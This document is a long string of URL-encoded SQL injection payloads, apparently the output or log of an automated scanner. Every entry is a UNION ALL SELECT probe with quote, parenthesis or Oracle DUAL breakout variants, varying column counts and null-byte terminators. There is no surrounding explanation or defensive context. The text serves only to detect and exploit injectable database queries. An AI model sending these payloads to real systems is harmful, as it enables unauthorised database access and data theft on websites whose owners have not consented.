-2018%22%20UNION%20ALL%20SELECT%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%00%20AND%20%22GZQT%22%3D%22GZQT -2813%22%20UNION%20ALL%20SELECT%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%00%20AND%20%22kaqV%22%3D%22kaqV -4970%22%20UNION%20ALL%20SELECT%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%00%20AND%20%22SWDk%22%3D%22SWDk -7351%22%20UNION%20ALL%20SELECT%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%00%20AND%20%22eTzQ%22%3D%22eTzQ -6507%22%20UNION%20ALL%20SELECT%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%00%20AND%20%22pkBf%22%3D%22pkBf -2153%22%20UNION%20ALL%20SELECT%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%2C%207284%00%20AND%20%22rREy%22%3D%22rREy -7523%22%20UNION%20ALL%20SELECT%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%2C%204319%00%20AND%20%22Rdbd%22%3D%22Rdbd -6461%22%20UNION%20ALL%20SELECT%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%00%20AND%20%22phct%22%3D%22phct -3934%22%20UNION%20ALL%20SELECT%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%2C%208728%00%20AND%20%22hRLp%22%3D%22hRLp -8084%22%20UNION%20ALL%20SELECT%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%00%20AND%20%22FYbI%22%3D%22FYbI -6839%22%29%20UNION%20ALL%20SELECT%209167%2C%209167%2C%209167%2C%209167%2C%209167%2C%209167%2C%209167%2C%209167%2C%209167%2C%209167%2C%209167%00%20AND%20%28%22PbIA%22%20LIKE%20%22PbIA -4158%22%29%20UNION%20ALL%20SELECT%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%00%20AND%20%28%22lkBS%22%20LIKE%20%22lkBS -9961%22%29%20UNION%20ALL%20SELECT%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%2C%206343%00%20AND%20%28%22DkPP%22%20LIKE%20%22DkPP -7910%22%29%20UNION%20ALL%20SELECT%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%00%20AND%20%28%22xasd%22%20LIKE%20%22xasd -3013%22%29%20UNION%20ALL%20SELECT%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%2C%205222%00%20AND%20%28%22JmpV%22%20LIKE%20%22JmpV -8925%22%29%20UNION%20ALL%20SELECT%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%2C%205962%00%20AND%20%28%22Pljo%22%20LIKE%20%22Pljo -3674%22%29%20UNION%20ALL%20SELECT%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%00%20AND%20%28%22xclb%22%20LIKE%20%22xclb -7881%22%29%20UNION%20ALL%20SELECT%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%00%20AND%20%28%22xIxf%22%20LIKE%20%22xIxf -9915%22%29%20UNION%20ALL%20SELECT%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%2C%207894%00%20AND%20%28%22YXlA%22%20LIKE%20%22YXlA -9626%22%29%20UNION%20ALL%20SELECT%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%00%20AND%20%28%22hlqP%22%20LIKE%20%22hlqP -4586%22%29%29%20UNION%20ALL%20SELECT%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529%2C%209529%00%20AND%20%28%28%22QIod%22%20LIKE%20%22QIod -9070%22%29%29%20UNION%20ALL%20SELECT%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%00%20AND%20%28%28%22Grhj%22%20LIKE%20%22Grhj -8504%22%29%29%20UNION%20ALL%20SELECT%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%00%20AND%20%28%28%22RPqc%22%20LIKE%20%22RPqc -5578%22%29%29%20UNION%20ALL%20SELECT%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%2C%206635%00%20AND%20%28%28%22avrK%22%20LIKE%20%22avrK -7197%22%29%29%20UNION%20ALL%20SELECT%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%00%20AND%20%28%28%22oSED%22%20LIKE%20%22oSED -2891%22%29%29%20UNION%20ALL%20SELECT%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%00%20AND%20%28%28%22nXhB%22%20LIKE%20%22nXhB -6789%22%29%29%20UNION%20ALL%20SELECT%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%00%20AND%20%28%28%22HbLP%22%20LIKE%20%22HbLP -9484%22%29%29%20UNION%20ALL%20SELECT%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%00%20AND%20%28%28%22neyT%22%20LIKE%20%22neyT -5842%22%29%29%20UNION%20ALL%20SELECT%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%2C%206456%00%20AND%20%28%28%22zkUe%22%20LIKE%20%22zkUe -8590%22%29%29%20UNION%20ALL%20SELECT%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%00%20AND%20%28%28%22bMig%22%20LIKE%20%22bMig -7063%22%29%29%29%20UNION%20ALL%20SELECT%205012%2C%205012%2C%205012%2C%205012%2C%205012%2C%205012%2C%205012%2C%205012%2C%205012%2C%205012%2C%205012%00%20AND%20%28%28%28%22Keen%22%20LIKE%20%22Keen -1639%22%29%29%29%20UNION%20ALL%20SELECT%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%00%20AND%20%28%28%28%22ZOlr%22%20LIKE%20%22ZOlr -8187%22%29%29%29%20UNION%20ALL%20SELECT%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%2C%203684%00%20AND%20%28%28%28%22gBgd%22%20LIKE%20%22gBgd -4055%22%29%29%29%20UNION%20ALL%20SELECT%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%00%20AND%20%28%28%28%22JCtn%22%20LIKE%20%22JCtn -6311%22%29%29%29%20UNION%20ALL%20SELECT%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%2C%202771%00%20AND%20%28%28%28%22QCal%22%20LIKE%20%22QCal -2977%22%29%29%29%20UNION%20ALL%20SELECT%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%2C%201310%00%20AND%20%28%28%28%22QKIY%22%20LIKE%20%22QKIY -1083%22%29%29%29%20UNION%20ALL%20SELECT%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%2C%208708%00%20AND%20%28%28%28%22SNpz%22%20LIKE%20%22SNpz -2240%22%29%29%29%20UNION%20ALL%20SELECT%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%00%20AND%20%28%28%28%22XqTA%22%20LIKE%20%22XqTA -7282%22%29%29%29%20UNION%20ALL%20SELECT%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%00%20AND%20%28%28%28%22hRfm%22%20LIKE%20%22hRfm -4696%22%29%29%29%20UNION%20ALL%20SELECT%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%2C%206062%00%20AND%20%28%28%28%22HlUW%22%20LIKE%20%22HlUW -6116%22%20UNION%20ALL%20SELECT%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%00%20AND%20%22DHlm%22%20LIKE%20%22DHlm -4729%22%20UNION%20ALL%20SELECT%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%00%20AND%20%22pQqQ%22%20LIKE%20%22pQqQ -9646%22%20UNION%20ALL%20SELECT%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%00%20AND%20%22OngX%22%20LIKE%20%22OngX -4539%22%20UNION%20ALL%20SELECT%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%2C%206457%00%20AND%20%22WOuE%22%20LIKE%20%22WOuE -8244%22%20UNION%20ALL%20SELECT%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%2C%207210%00%20AND%20%22xiaT%22%20LIKE%20%22xiaT -2042%22%20UNION%20ALL%20SELECT%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%2C%205023%00%20AND%20%22jOHi%22%20LIKE%20%22jOHi -8913%22%20UNION%20ALL%20SELECT%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%2C%209017%00%20AND%20%22Jgwg%22%20LIKE%20%22Jgwg -7089%22%20UNION%20ALL%20SELECT%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%2C%202558%00%20AND%20%22helu%22%20LIKE%20%22helu -7553%22%20UNION%20ALL%20SELECT%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%2C%202532%00%20AND%20%22aDFm%22%20LIKE%20%22aDFm -7091%22%20UNION%20ALL%20SELECT%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%00%20AND%20%22eHwU%22%20LIKE%20%22eHwU -4558%29%20WHERE%203689%3D3689%20UNION%20ALL%20SELECT%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%00 -4498%29%20WHERE%206288%3D6288%20UNION%20ALL%20SELECT%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%00 -3540%29%20WHERE%203046%3D3046%20UNION%20ALL%20SELECT%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%2C%203046%00 -5626%29%20WHERE%205655%3D5655%20UNION%20ALL%20SELECT%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%00 -4481%29%20WHERE%204352%3D4352%20UNION%20ALL%20SELECT%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%00 -7864%29%20WHERE%203967%3D3967%20UNION%20ALL%20SELECT%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%00 -5227%29%20WHERE%204912%3D4912%20UNION%20ALL%20SELECT%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%00 -6677%29%20WHERE%201331%3D1331%20UNION%20ALL%20SELECT%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%2C%201331%00 -9407%29%20WHERE%207723%3D7723%20UNION%20ALL%20SELECT%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%00 -5338%29%20WHERE%204062%3D4062%20UNION%20ALL%20SELECT%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%2C%204062%00 -5439%27%29%20WHERE%207319%3D7319%20UNION%20ALL%20SELECT%207319%2C%207319%2C%207319%2C%207319%2C%207319%2C%207319%2C%207319%2C%207319%2C%207319%2C%207319%2C%207319%00 -3325%27%29%20WHERE%205116%3D5116%20UNION%20ALL%20SELECT%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%2C%205116%00 -1912%27%29%20WHERE%202268%3D2268%20UNION%20ALL%20SELECT%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%2C%202268%00 -2169%27%29%20WHERE%204211%3D4211%20UNION%20ALL%20SELECT%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%00 -4352%27%29%20WHERE%203518%3D3518%20UNION%20ALL%20SELECT%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%2C%203518%00 -1592%27%29%20WHERE%202049%3D2049%20UNION%20ALL%20SELECT%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%00 -3251%27%29%20WHERE%207266%3D7266%20UNION%20ALL%20SELECT%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%2C%207266%00 -8222%27%29%20WHERE%208523%3D8523%20UNION%20ALL%20SELECT%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%00 -3209%27%29%20WHERE%209054%3D9054%20UNION%20ALL%20SELECT%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%00 -2883%27%29%20WHERE%207711%3D7711%20UNION%20ALL%20SELECT%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%2C%207711%00 -9668%27%20WHERE%202027%3D2027%20UNION%20ALL%20SELECT%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%00 -9470%27%20WHERE%204390%3D4390%20UNION%20ALL%20SELECT%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%00 -1950%27%20WHERE%209672%3D9672%20UNION%20ALL%20SELECT%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%2C%209672%00 -3189%27%20WHERE%202456%3D2456%20UNION%20ALL%20SELECT%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%2C%202456%00 -2696%27%20WHERE%207055%3D7055%20UNION%20ALL%20SELECT%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%2C%207055%00 -8035%27%20WHERE%205325%3D5325%20UNION%20ALL%20SELECT%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%00 -6185%27%20WHERE%205693%3D5693%20UNION%20ALL%20SELECT%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%2C%205693%00 -7630%27%20WHERE%205037%3D5037%20UNION%20ALL%20SELECT%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%2C%205037%00 -7772%27%20WHERE%203819%3D3819%20UNION%20ALL%20SELECT%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%2C%203819%00 -3834%27%20WHERE%209898%3D9898%20UNION%20ALL%20SELECT%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%00 -8577%22%20WHERE%209337%3D9337%20UNION%20ALL%20SELECT%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%2C%209337%00 -8272%22%20WHERE%206934%3D6934%20UNION%20ALL%20SELECT%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%2C%206934%00 -4108%22%20WHERE%205383%3D5383%20UNION%20ALL%20SELECT%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%00 -6524%22%20WHERE%203033%3D3033%20UNION%20ALL%20SELECT%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%2C%203033%00 -8455%22%20WHERE%205738%3D5738%20UNION%20ALL%20SELECT%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%2C%205738%00 -7270%22%20WHERE%209777%3D9777%20UNION%20ALL%20SELECT%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%2C%209777%00 -2025%22%20WHERE%209711%3D9711%20UNION%20ALL%20SELECT%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%2C%209711%00 -3558%22%20WHERE%202554%3D2554%20UNION%20ALL%20SELECT%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%2C%202554%00 -1349%22%20WHERE%202393%3D2393%20UNION%20ALL%20SELECT%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%00 -1694%22%20WHERE%202813%3D2813%20UNION%20ALL%20SELECT%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%2C%202813%00 -4457%27%20%7C%7C%20%28SELECT%202299%20FROM%20DUAL%20WHERE%204385%3D4385%20UNION%20ALL%20SELECT%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%2C%204385%00%20%29%20%7C%7C%20%27 -2824%27%20%7C%7C%20%28SELECT%208124%20FROM%20DUAL%20WHERE%202651%3D2651%20UNION%20ALL%20SELECT%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%2C%202651%00%20%29%20%7C%7C%20%27 -8243%27%20%7C%7C%20%28SELECT%208694%20FROM%20DUAL%20WHERE%207455%3D7455%20UNION%20ALL%20SELECT%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%2C%207455%00%20%29%20%7C%7C%20%27 -8893%27%20%7C%7C%20%28SELECT%208901%20FROM%20DUAL%20WHERE%201490%3D1490%20UNION%20ALL%20SELECT%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%00%20%29%20%7C%7C%20%27 -6607%27%20%7C%7C%20%28SELECT%207487%20FROM%20DUAL%20WHERE%209949%3D9949%20UNION%20ALL%20SELECT%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%00%20%29%20%7C%7C%20%27 -4749%27%20%7C%7C%20%28SELECT%204867%20FROM%20DUAL%20WHERE%203200%3D3200%20UNION%20ALL%20SELECT%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%00%20%29%20%7C%7C%20%27 -5278%27%20%7C%7C%20%28SELECT%204710%20FROM%20DUAL%20WHERE%205139%3D5139%20UNION%20ALL%20SELECT%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%00%20%29%20%7C%7C%20%27 -8485%27%20%7C%7C%20%28SELECT%203926%20FROM%20DUAL%20WHERE%207485%3D7485%20UNION%20ALL%20SELECT%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%2C%207485%00%20%29%20%7C%7C%20%27 -1489%27%20%7C%7C%20%28SELECT%201948%20FROM%20DUAL%20WHERE%204592%3D4592%20UNION%20ALL%20SELECT%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%2C%204592%00%20%29%20%7C%7C%20%27 -4930%27%20%7C%7C%20%28SELECT%207635%20FROM%20DUAL%20WHERE%205226%3D5226%20UNION%20ALL%20SELECT%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%00%20%29%20%7C%7C%20%27 -8885%27%20%7C%7C%20%28SELECT%202144%20WHERE%205808%3D5808%20UNION%20ALL%20SELECT%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%00%20%29%20%7C%7C%20%27 -3314%27%20%7C%7C%20%28SELECT%202259%20WHERE%206777%3D6777%20UNION%20ALL%20SELECT%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%00%20%29%20%7C%7C%20%27 -7615%27%20%7C%7C%20%28SELECT%209593%20WHERE%207562%3D7562%20UNION%20ALL%20SELECT%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%2C%207562%00%20%29%20%7C%7C%20%27 -2420%27%20%7C%7C%20%28SELECT%208197%20WHERE%207948%3D7948%20UNION%20ALL%20SELECT%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%2C%207948%00%20%29%20%7C%7C%20%27 -6735%27%20%7C%7C%20%28SELECT%203842%20WHERE%201926%3D1926%20UNION%20ALL%20SELECT%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%2C%201926%00%20%29%20%7C%7C%20%27 